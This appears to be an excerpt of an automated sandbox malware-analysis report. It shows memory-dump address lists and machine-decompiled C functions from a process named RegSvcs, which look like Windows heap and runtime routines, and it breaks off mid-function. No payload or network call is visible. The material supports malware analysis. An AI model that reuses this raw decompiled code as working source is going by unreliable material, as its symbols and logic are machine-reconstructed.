0x00ab5cbd
0x00ab5cbd
0x00000000
0x00ab5cbd
0x00ab5cbb
0x00a72ab1
0x00a72ab1
0x00a72ac4
0x00a72ac6
0x00a72ac6
0x00000000
0x00a72ac6
0x00a72aab
0x00000000
0x00a72a00
0x00a72a09
0x00a72a0e
0x00a72a21
0x00a72a24
0x00a72a35
0x00a72a3a
0x00a72a3d
0x00a72a42
0x00a72a59
0x00a72a59
0x00a72a5c
0x00a72a5f
0x00a72a5f
0x00a729fa
0x00a729f3
0x00a72a64
0x00a72a64
0x00a72a6b
0x00a72a6b
0x00a72a6d
0x00a72a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af5d3cd258fcbd5f7c10e32beaade963abf74158ec9011225b64c0759bbf843
Instruction ID: cf1d0dc400bdacc5177d5af2bd043fcd756dbfcd68fd56fc3565610dcb640f07
Opcode Fuzzy Hash: 7af5d3cd258fcbd5f7c10e32beaade963abf74158ec9011225b64c0759bbf843
Instruction Fuzzy Hash: 47514471A002099FDF25DF55CD80ADEBBB6BF48350F14C069F918AB221D3359D92DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A74BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A74BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0xb3d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00A4CC50(_t86);
					L11:
					return E00A8B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0xb38504
				E00A62280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00A8FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00A8B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00A64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00A4CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0xb38504
								E00A5FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00A74F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x00a74bad
0x00a74bbf
0x00a74bc2
0x00a74bc6
0x00a74bcd
0x00a74bd9
0x00ab67fe
0x00ab6800
0x00a74ccc
0x00a74ccd
0x00a74cb7
0x00a74cc9
0x00a74cc9
0x00a74bdf
0x00a74be5
0x00000000
0x00000000
0x00a74beb
0x00a74bef
0x00000000
0x00000000
0x00a74bf5
0x00a74bf9
0x00a74c06
0x00a74c0b
0x00a74c17
0x00a74c1c
0x00a74c1f
0x00a74c25
0x00a74c33
0x00a74c3d
0x00a74c40
0x00a74c43
0x00a74c47
0x00a74c4d
0x00a74c53
0x00a74c54
0x00a74c55
0x00a74c56
0x00a74c5b
0x00a74c5c
0x00a74c63
0x00a74c6b
0x00000000
0x00000000
0x00ab6776
0x00ab6784
0x00ab6784
0x00ab679f
0x00ab67a7
0x00ab67af
0x00ab67ce
0x00000000
0x00ab67b1
0x00ab67b7
0x00ab67b8
0x00ab67c1
0x00ab67d3
0x00ab67d9
0x00ab67dd
0x00a74c94
0x00a74c94
0x00a74c98
0x00a74c9c
0x00a74ca3
0x00ab67f4
0x00ab67f4
0x00a74cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00a74cb5
0x00a74c79
0x00a74c7e
0x00a74c89
0x00a74c8b
0x00a74c8f
0x00a74c8f
0x00000000
0x00a74c89
0x00ab67c3
0x00000000
0x00ab67c3
0x00ab67af
0x00a74c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76d0717e15042ac2b8aca450b923f930359c40db73c3bc930b4888387253ae3
Instruction ID: 521e611318e196466464bc1d4329f4771806636dbb41277908684396fc2f16c7
Opcode Fuzzy Hash: e76d0717e15042ac2b8aca450b923f930359c40db73c3bc930b4888387253ae3
Instruction Fuzzy Hash: 99418435A412289BCB21DF68CD41FEE77B8EF49750F0140A5E90CAB252DB78DE84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00A74D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A74D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0xb3d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00A8FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0xb37bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00A8B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00A64620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00A4CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00A8B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00A8F380(_t67 + 0xc, 0xa25138, 0x10) == 0) {
								 *0xb360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00A74F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00A74E70(0xb386b0, 0xa75690, 0, 0) != 0) {
					_t46 = E00A4CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x00a74d3b
0x00a74d4d
0x00a74d53
0x00a74d58
0x00a74d65
0x00a74d6c
0x00a74d71
0x00a74d77
0x00a74d7f
0x00a74d8c
0x00a74d8e
0x00a74dad
0x00a74db0
0x00a74db7
0x00a74db8
0x00a74db9
0x00a74dba
0x00a74dbb
0x00a74dc1
0x00a74dc8
0x00a74dcc
0x00a74dd5
0x00a74dde
0x00a74ddf
0x00a74de0
0x00a74de1
0x00a74de6
0x00a74de7
0x00a74de9
0x00a74df3
0x00000000
0x00000000
0x00ab6c7c
0x00ab6c8a
0x00ab6c8a
0x00ab6c9d
0x00ab6ca7
0x00ab6cac
0x00ab6cb2
0x00ab6cb9
0x00000000
0x00ab6cbf
0x00ab6cbf
0x00000000
0x00ab6cbf
0x00ab6cb9
0x00a74dfb
0x00ab6ccf
0x00ab6cd3
0x00a74e32
0x00a74e39
0x00ab6ce0
0x00ab6cf2
0x00ab6cf2
0x00ab6ce0
0x00a74e3f
0x00a74e41
0x00a74e51
0x00a74e51
0x00a74e03
0x00a74e03
0x00a74e09
0x00a74e0f
0x00a74e57
0x00000000
0x00000000
0x00a74e1b
0x00a74e30
0x00a74e5b
0x00a74e5b
0x00000000
0x00a74e30
0x00a74e11
0x00a74e11
0x00a74e16
0x00000000
0x00a74e16
0x00a74e01
0x00000000
0x00a74e01
0x00a74da5
0x00ab6c6b
0x00000000
0x00a74dab
0x00a74dab
0x00000000
0x00a74dab

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ddb3666d3711a56831da7c19765a7be196ed39c243a517555995e04f1fef46
Instruction ID: ce8b49ca717aa03c580d3a47c66fc15c05e7549efdb815d2962cc366b43c716b
Opcode Fuzzy Hash: 29ddb3666d3711a56831da7c19765a7be196ed39c243a517555995e04f1fef46
Instruction Fuzzy Hash: 2C41A271A40318AFEB21DF14CD81FAAB7B9FB49720F1480A9E94997282DB74DD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E00B0ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E00B0AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E00B0AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E00AECB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L00A677F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E00A67D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B0131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E00AECB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x00b0aa1f
0x00b0aa21
0x00b0aa23
0x00b0aa2b
0x00b0aa30
0x00b0aa36
0x00b0aa39
0x00b0aa42
0x00b0aa75
0x00b0aa7a
0x00b0aa7c
0x00b0aa7c
0x00b0aa88
0x00b0aa8a
0x00b0aa8f
0x00b0ab02
0x00b0ab04
0x00b0aa99
0x00b0aaa8
0x00b0aaaf
0x00b0aab3
0x00b0aacc
0x00b0aad1
0x00b0aad6
0x00b0aae0
0x00b0aaf3
0x00b0aaf9
0x00b0aafe
0x00b0aafe
0x00b0aaf3
0x00b0aad6
0x00b0aab3
0x00b0ab07
0x00b0ab0a
0x00b0ab11
0x00b0ab23
0x00b0ab13
0x00b0ab1c
0x00b0ab1c
0x00b0ab2b
0x00b0ab44
0x00b0ab44
0x00b0ab51
0x00b0ab51
0x00b0aa44
0x00b0aa47
0x00b0aa4c
0x00000000
0x00000000
0x00b0aa5a
0x00b0aa64
0x00b0aa72
0x00000000
0x00b0aa66
0x00b0aa66
0x00b0aa68
0x00b0aa6a
0x00000000
0x00b0aa6a

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: da571b5b71a4c2464415f8db698019d02ca02b3172d53b2e0e242d742d37adb6
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: BD31CE32F003446BDB159A69CC86BAFFBFAEF84310F1584A9E805A72D2DA74ED41C651

Uniqueness

Uniqueness Score: -1.00%

Function 00A58A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A58A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0xb3d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00A8B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00A5E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xa21180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E00A71DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00A83C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00A58999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x00a58a0a
0x00a58a1c
0x00a58a23
0x00a58a2e
0x00a58a30
0x00a58a36
0x00a58a3c
0x00a58a3e
0x00a58a4a
0x00a58a52
0x00a58a9c
0x00a58aae
0x00a58a58
0x00a58a5e
0x00a58a6a
0x00a58a6f
0x00a58a75
0x00a58a7d
0x00a58a85
0x00a58a86
0x00a58a89
0x00a58a93
0x00a58a99
0x00a58a9b
0x00000000
0x00a58aaf
0x00a58abe
0x00a58ac3
0x00a58acb
0x00a58ad7
0x00a58ae0
0x00a58af1
0x00000000
0x00a58af1
0x00a58acd
0x00a58ad5
0x00a58afb
0x00a58afd
0x00a58aff
0x00a58b07
0x00a58b22
0x00a58b24
0x00a58b2a
0x00a58b2e
0x00a58b3f
0x00a58b78
0x00a58b41
0x00a58b52
0x00a58b54
0x00a58b5c
0x00a58b74
0x00a58b74
0x00a58b5c
0x00a58b3f
0x00a58b5e
0x00a58b61
0x00a58b64
0x00a58b64
0x00a58b6c
0x00a58b6c
0x00a58b11
0x00aa9cd5
0x00aa9cd5
0x00a58b17
0x00a58b1a
0x00a58b1a
0x00000000
0x00a58ad5
0x00a58a89

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764fe0a320ddb1596abf50e33cee2e88d36777ddb0ca25abf9956f417cd2e605
Instruction ID: 394c4c969edfcc3caad5375ff8ad3858a7e7a7beeb0ab0b3fa67531e3d8e5c43
Opcode Fuzzy Hash: 764fe0a320ddb1596abf50e33cee2e88d36777ddb0ca25abf9956f417cd2e605
Instruction Fuzzy Hash: 124163B1A0022C9BDB24DF15CC88AA9B3F8FB54341F1145EAED19A7252EB749E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B0FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B0FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E00B0FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E00B10A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E00A67D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E00B01608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E00B12B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E00B0C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E00B0DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E00A67D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E00B0A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x00b0fde7
0x00b0fde8
0x00b0fdec
0x00b0fdee
0x00b0fdf5
0x00b0fdf7
0x00b0fdfc
0x00b0fe19
0x00b0fe22
0x00b0fe26
0x00b0fec6
0x00b0fecd
0x00b0fed5
0x00b0fee7
0x00b0fed7
0x00b0fee0
0x00b0fee0
0x00b0feef
0x00b0ff00
0x00b0ff02
0x00b0ff07
0x00b0ff07
0x00000000
0x00b0feef
0x00b0fe33
0x00b0fe55
0x00b0fe59
0x00b0fe5b
0x00b0fe5e
0x00b0fe69
0x00b0fe6d
0x00b0fe6d
0x00b0fe69
0x00b0fe35
0x00b0fe41
0x00b0fe41
0x00b0fe79
0x00b0fe8b
0x00b0fe7b
0x00b0fe84
0x00b0fe84
0x00b0fe93
0x00000000
0x00b0fea8
0x00b0feba
0x00000000
0x00b0feba
0x00b0fdfe
0x00b0fe01
0x00b0fe02
0x00b0fe08
0x00b0ff0c
0x00b0ff14
0x00b0ff14

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 83c0d15e185cd6f29b568d4c7de8baea7a262fdedf75af451b1273b951a3fff7
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 4131E532304642AFD7329768C885F7A7FEAEB85750F1885A8F5468BBD2DA74DC41C710

Uniqueness

Uniqueness Score: -1.00%

Function 00B0EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B0EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00A62280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E00B0E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00A4F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E00A5FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E00B0AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E00B0BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E00A67D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E00AFFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E00A5FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E00B0A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x00b0ea55
0x00b0ea66
0x00b0ea68
0x00b0ea6c
0x00b0ea6f
0x00b0ea72
0x00b0ea75
0x00b0ea7a
0x00b0ea7a
0x00b0ea7e
0x00b0ea80
0x00b0ea85
0x00b0ea8b
0x00b0eab5
0x00b0eabc
0x00b0eabf
0x00b0eabf
0x00b0eaca
0x00b0eace
0x00b0ead0
0x00b0eae4
0x00b0eaeb
0x00b0eaf0
0x00b0eaf5
0x00b0eb09
0x00b0eb0d
0x00b0eb1d
0x00b0eb2d
0x00b0eb38
0x00b0eb3d
0x00b0eb41
0x00b0eb4a
0x00b0eb60
0x00b0eb4c
0x00b0eb52
0x00b0eb59
0x00b0eb59
0x00b0eb68
0x00b0eb71
0x00b0eb71
0x00b0ea8d
0x00b0ea8f
0x00b0ea92
0x00b0ea97
0x00b0ea97
0x00b0ea9b
0x00b0ea9c
0x00b0ea9e
0x00b0eaa6
0x00b0eaa6
0x00b0eb7e

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 7d78a831b1e1371cdcb7c756e99080c514fa30c0ed19a9080dfae1c115062184
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: EA3172726047059FC719DF24C981A6BBBE9FBC4350F04896DF56687681DA34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC69A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00AC69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0xb3d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00A56C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00AC6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00A89980() >= 0) {
							E00A62280(_t56, 0xb38778);
							_t77 = 1;
							_t68 = 1;
							if( *0xb38774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0xb38774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
